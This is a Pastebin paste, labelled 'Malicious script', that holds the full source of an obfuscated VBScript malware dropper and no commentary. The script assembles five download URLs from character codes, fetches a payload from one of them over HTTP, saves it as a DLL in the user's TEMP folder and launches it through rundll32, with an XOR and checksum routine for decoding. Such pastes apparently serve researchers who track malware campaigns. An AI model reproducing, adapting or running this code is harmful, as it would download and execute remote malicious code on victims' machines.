SHARE
TWEET

Malicious script

dynamoo Oct 27th, 2016 134 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. On Error Resume Next
  2. Const Lb8 = 1, DFm = 2, SUo8 = 8
  3. Const GUc = 1, Yp = 2, TLy = 2
  4. Const Hp0 = "437"
  5. Function VKr1(Mo)
  6. Dim HAq8(255), QXn5, OJj2
  7. HAq8(128)=199
  8. HAq8(129)=252
  9. HAq8(130)=233
  10. HAq8(131)=226
  11. HAq8(132)=228
  12. HAq8(133)=224
  13. HAq8(134)=229
  14. HAq8(135)=231
  15. HAq8(136)=234
  16. HAq8(137)=235
  17. HAq8(138)=232
  18. HAq8(139)=239
  19. HAq8(140)=238
  20. HAq8(141)=236
  21. HAq8(142)=196
  22. HAq8(143)=197
  23. HAq8(144)=201
  24. HAq8(145)=230
  25. HAq8(146)=198
  26. HAq8(147)=244
  27. HAq8(148)=246
  28. HAq8(149)=242
  29. HAq8(150)=251
  30. HAq8(151)=249
  31. HAq8(152)=255
  32. HAq8(153)=214
  33. HAq8(154)=220
  34. HAq8(155)=162
  35. HAq8(156)=163
  36. HAq8(157)=165
  37. HAq8(158)=8359
  38. HAq8(159)=402
  39. HAq8(160)=225
  40. HAq8(161)=237
  41. HAq8(162)=243
  42. HAq8(163)=250
  43. HAq8(164)=241
  44. HAq8(165)=209
  45. HAq8(166)=170
  46. HAq8(167)=186
  47. HAq8(168)=191
  48. HAq8(169)=8976
  49. HAq8(170)=172
  50. HAq8(171)=189
  51. HAq8(172)=188
  52. HAq8(173)=161
  53. HAq8(174)=171
  54. HAq8(175)=187
  55. HAq8(176)=9617
  56. HAq8(177)=9618
  57. HAq8(178)=9619
  58. HAq8(179)=9474
  59. HAq8(180)=9508
  60. HAq8(181)=9569
  61. HAq8(182)=9570
  62. HAq8(183)=9558
  63. HAq8(184)=9557
  64. HAq8(185)=9571
  65. HAq8(186)=9553
  66. HAq8(187)=9559
  67. HAq8(188)=9565
  68. HAq8(189)=9564
  69. HAq8(190)=9563
  70. HAq8(191)=9488
  71. HAq8(192)=9492
  72. HAq8(193)=9524
  73. HAq8(194)=9516
  74. HAq8(195)=9500
  75. HAq8(196)=9472
  76. HAq8(197)=9532
  77. HAq8(198)=9566
  78. HAq8(199)=9567
  79. HAq8(200)=9562
  80. HAq8(201)=9556
  81. HAq8(202)=9577
  82. HAq8(203)=9574
  83. HAq8(204)=9568
  84. HAq8(205)=9552
  85. HAq8(206)=9580
  86. HAq8(207)=9575
  87. HAq8(208)=9576
  88. HAq8(209)=9572
  89. HAq8(210)=9573
  90. HAq8(211)=9561
  91. HAq8(212)=9560
  92. HAq8(213)=9554
  93. HAq8(214)=9555
  94. HAq8(215)=9579
  95. HAq8(216)=9578
  96. HAq8(217)=9496
  97. HAq8(218)=9484
  98. HAq8(219)=9608
  99. HAq8(220)=9604
  100. HAq8(221)=9612
  101. HAq8(222)=9616
  102. HAq8(223)=9600
  103. HAq8(224)=945
  104. HAq8(225)=223
  105. HAq8(226)=915
  106. HAq8(227)=960
  107. HAq8(228)=931
  108. HAq8(229)=963
  109. HAq8(230)=181
  110. HAq8(231)=964
  111. HAq8(232)=934
  112. HAq8(233)=920
  113. HAq8(234)=937
  114. HAq8(235)=948
  115. HAq8(236)=8734
  116. HAq8(237)=966
  117. HAq8(238)=949
  118. HAq8(239)=8745
  119. HAq8(240)=8801
  120. HAq8(241)=177
  121. HAq8(242)=8805
  122. HAq8(243)=8804
  123. HAq8(244)=8992
  124. HAq8(245)=8993
  125. HAq8(246)=247
  126. HAq8(247)=8776
  127. HAq8(248)=176
  128. HAq8(249)=8729
  129. HAq8(250)=183
  130. HAq8(251)=8730
  131. HAq8(252)=8319
  132. HAq8(253)=178
  133. HAq8(254)=9632
  134. HAq8(255)=160
  135. s = ""
  136. For OJj2 = 0 To UBound(Mo)
  137. If Mo(OJj2) < 0 Or Mo(OJj2) > 255 Then
  138. Err.Raise 50003, "", "a2s()", "", 0
  139. ElseIf Mo(OJj2) >= 128 Then
  140. QXn5 = QXn5 & ChrW(HAq8(Mo(OJj2)))
  141. Else
  142. QXn5 = QXn5 & ChrW(Mo(OJj2))
  143. End If
  144. Next
  145. VKr1 = QXn5
  146. End Function
  147. Function Pp3(ISj)
  148. Dim Gg0, TMr3, QXn5
  149. Set Gg0 = CreateObject("ADODB.Stream")
  150. Gg0.type = Yp
  151. Gg0.Charset = Hp0
  152. Gg0.Open
  153. Gg0.LoadFromFile ISj
  154. QXn5 = Gg0.ReadText
  155. Gg0.Close
  156. Pp3 = SOk8(QXn5)
  157. End Function
  158. Sub XTk(ISj, Mo)
  159. Dim Gg0, QXn5
  160. Set Gg0 = CreateObject("ADODB.Stream")
  161. Gg0.type = Yp
  162. Gg0.Charset = Hp0
  163. Gg0.Open
  164. QXn5 = VKr1(Mo)
  165. Gg0.WriteText QXn5
  166. Gg0.SaveToFile ISj, TLy
  167. Gg0.Close
  168. End Sub
  169. Function IQm(Ks)
  170. Dim QXn5, No(0)
  171. If Ks <= 0 Then
  172. Err.Raise 50001, "", "makearrr()", "", 0
  173. ElseIf Ks = 1 Then
  174. IQm = No
  175. Else
  176. QXn5 = Space(Ks-1)
  177. IQm = Split(QXn5, " ")
  178. End If
  179. End Function
  180. Function MCf7(url)
  181. Dim Kf1, Gs, TMr3, OJj2
  182. Dim KCq, Aq9(1)
  183. Set Kf1 = CreateObject("Scripting.FileSystemObject")
  184. Aq9(0) = "WinHttp.WinHttpRequest.5.1"
  185. Aq9(1) = "MSXML2.XMLHTTP"
  186. For Each KCq in Aq9
  187. Err.Clear
  188. Set Gs = CreateObject(KCq)
  189. If Err.Number = 0 Then
  190. Exit For
  191. End If
  192. Next
  193. Gs.Open "GET", url, False
  194. Gs.Send
  195. TMr3 = IQm(LenB(Gs.ResponseBody))
  196. For OJj2 = 1 To LenB(Gs.ResponseBody)
  197. TMr3(OJj2-1) = AscB(MidB(Gs.ResponseBody, OJj2, 1))
  198. Next
  199. MCf7 = TMr3
  200. End Function
  201. Function UPx6()
  202. Dim Ov8, ESx, VBd1
  203. Set Ov8 = CreateObject("WScript.Shell")
  204. Set ESx = Ov8.Environment("System")
  205. VBd1 = ESx("PROCESSOR_ARCHITECTURE")
  206. If LCase(VBd1) = "amd64" Then
  207. UPx6 = Ov8.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
  208. Else
  209. UPx6 = Ov8.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
  210. End If
  211. End Function
  212. Sub Ye3(VPs, FZb1, Ta7)
  213. Dim Ov8, Kf1, Rp3, Zb0, Bn2
  214. Set Ov8 = CreateObject("WScript.Shell")
  215. Set Kf1 = CreateObject("Scripting.FileSystemObject")
  216. Set Rp3 = Kf1.GetFile(VPs)
  217. Zb0 = Rp3.ShortPath
  218. Bn2 = UPx6() + " " + Zb0 + "," + FZb1 + " " + Ta7
  219. If 2 > 1 Then
  220. Ov8.Run(Bn2)
  221. End If
  222. End Sub
  223. Function DAk9(VPs)
  224. Dim Kf1
  225. Set Kf1 = CreateObject("Scripting.FileSystemObject")
  226. DAk9 = Kf1.FileExists(VPs)
  227. End Function
  228. Function MWp(VPs)
  229. Dim Kf1, Rp3
  230. Set Kf1 = CreateObject("Scripting.FileSystemObject")
  231. Set Rp3 = Kf1.GetFile(VPs)
  232. MWp = Rp3.ShortPath
  233. End Function
  234. Function Ff3(Bg, Mq7)
  235. Dim Ks
  236. Ks = CDbl(Int(CDbl(Bg)/CDbl(Mq7)))
  237. Ff3 = CDbl(Bg) - Ks * CDbl(Mq7)
  238. End Function
  239. Function MIv4(IUj, QXn5)
  240. QXn5(0) = 171 * QXn5(0) Mod 30269
  241. QXn5(1) = 172 * QXn5(1) Mod 30307
  242. QXn5(2) = 170 * QXn5(2) Mod 30323
  243. Dim SOz3
  244. SOz3 = Ff3((CDbl(QXn5(0))/30269.0 + CDbl(QXn5(1))/30307.0 + CDbl(QXn5(2))/30323.0), 1.0)
  245. MIv4 = Int(SOz3 * CDbl(IUj))
  246. End Function
  247. Function Kz5(TMr3, CLn)
  248. Dim Yr(2), DLs6, BVp, Pa0, OJj2
  249. If UBound(TMr3) < 3 Then
  250. Err.Raise 50004, "", "size of array muzt be >= 4", "", 0
  251. End If
  252. DLs6 = IQm(UBound(TMr3) - 3)
  253. Yr(0) = CLn(0)
  254. Yr(1) = CLn(1)
  255. Yr(2) = CLn(2)
  256. For OJj2 = 0 To UBound(TMr3)
  257. TMr3(OJj2) = TMr3(OJj2) Xor MIv4(256, Yr)
  258. Next
  259. BVp = TMr3(UBound(TMr3)-3)+(TMr3(UBound(TMr3)-2)*256)+(TMr3(UBound(TMr3)-1)*256*256)+(TMr3(UBound(TMr3))*256*256*256)
  260. Pa0 = ZBk2
  261. For OJj2 = 0 To UBound(DLs6)
  262. DLs6(OJj2) = TMr3(OJj2)
  263. Pa0 = (Pa0 + TMr3(OJj2)) Mod 1000000000
  264. Next
  265. If Pa0 <> BVp Then
  266. Err.Raise 50005, "", "checksum error", "", 0
  267. End If
  268. Kz5 = DLs6
  269. End Function
  270. Function LLq(Ke4)
  271. LLq = CInt(Ke4*Rnd())
  272. End Function
  273. Sub RTr1(Dc)
  274. WScript.Sleep(Dc)
  275. End Sub
  276. Randomize
  277. Dim WAz(2), ZBk2, YAz(4), ISj
  278. WAz(0) = 25482
  279. WAz(1) = 2072
  280. WAz(2) = 22148
  281. ZBk2 = 32
  282. YAz(0)=cHr(104) & cHr(116) + cHr(116) & cHr(112) + cHr(58) + cHr(47) + cHr(47) + cHr(97) + "c" + cHr(116) & cHr(105) + cHr(111) & cHr(110) & cHr(111) & cHr(110) + cHr(115) & "p" & cHr(111) + cHr(114) + cHr(116) & cHr(115) + cHr(46) & cHr(99) + cHr(111) & cHr(109) & cHr(47) + cHr(107) + cHr(113) + "0" + cHr(117) + "9" + "3" & cHr(97) + cHr(49)
  283. YAz(1)=cHr(104) + "t" + cHr(116) & "p" + cHr(58) + "/" & cHr(47) + cHr(100) & cHr(109) & cHr(116) & cHr(121) & cHr(97) + cHr(46) + cHr(114) + "u" + cHr(47) + cHr(109) + cHr(112) & "o" + "z" + cHr(99) & "e" + cHr(117)
  284. YAz(2)="h" & cHr(116) + cHr(116) & "p" + cHr(58) + "/" + cHr(47) + cHr(99) + "a" & cHr(108) & cHr(108) + cHr(105) & cHr(100) + "e" & "o" & cHr(46) + cHr(102) + cHr(114) & cHr(47) & "m" + cHr(115) + "n" + "9" & "a" + cHr(114)
  285. YAz(3)=cHr(104) & cHr(116) & cHr(116) & cHr(112) + cHr(58) & cHr(47) + cHr(47) & cHr(102) & cHr(108) & cHr(117) & cHr(116) + cHr(121) & "g" & "o" & cHr(121) + cHr(46) & cHr(110) & cHr(101) + cHr(116) + cHr(47) & cHr(56) + cHr(50) & cHr(111) + cHr(107) + "z" + cHr(122) + cHr(107) & cHr(113)
  286. YAz(4)=cHr(104) + cHr(116) + "t" + "p" & cHr(58) & cHr(47) + "/" + cHr(116) + "h" + "e" + cHr(97) + cHr(116) + cHr(111) + "s" + cHr(99) + cHr(46) & cHr(110) + cHr(101) & cHr(116) + cHr(47) + cHr(56) + cHr(106) + cHr(51) & cHr(119) & cHr(109)
  287. ISj = "e134dkdCXFS"
  288. Dim Ov8, Yl8, TKh, Rd
  289. Set objShell = CreateObject("WScript.Shell")
  290. Yl8 = objShell.ExpandEnvironmentStrings("%" & "TEMP%")
  291. TKh = Yl8 & "\" & ISj & ".dll"
  292. Dim VZx1, EYi7, Bd, Hp, OJj2
  293. EYi7 = False
  294. For OJj2=0 To 10: Do
  295. If DAk9(TKh) Then
  296. Rd = MWp(TKh) & ".txt"
  297. If DAk9(Rd) Then
  298. WScript.Quit(0)
  299. End If
  300. End If
  301. If Not EYi7 Then
  302. VZx1 = LLq(UBound(YAz))
  303. Bd = MCf7(YAz(VZx1))
  304. If Err.Number <> 0 Then
  305. Exit Do
  306. End If
  307. Hp = Bd  ' Kz5(Bd, WAz)
  308. If Err.Number <> 0 Then
  309. Exit Do
  310. End If
  311. XTk TKh, Hp
  312. If Err.Number <> 0 Then
  313. Exit Do
  314. End If
  315. EYi7 = True
  316. End If
  317. Ye3 TKh, "EnhancedStoragePasswordConfig", "147"
  318. RTr1 24999
  319. Loop While False: Next
  320. If 2=2 Then
  321. WScript.Quit(1)
  322. End If
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top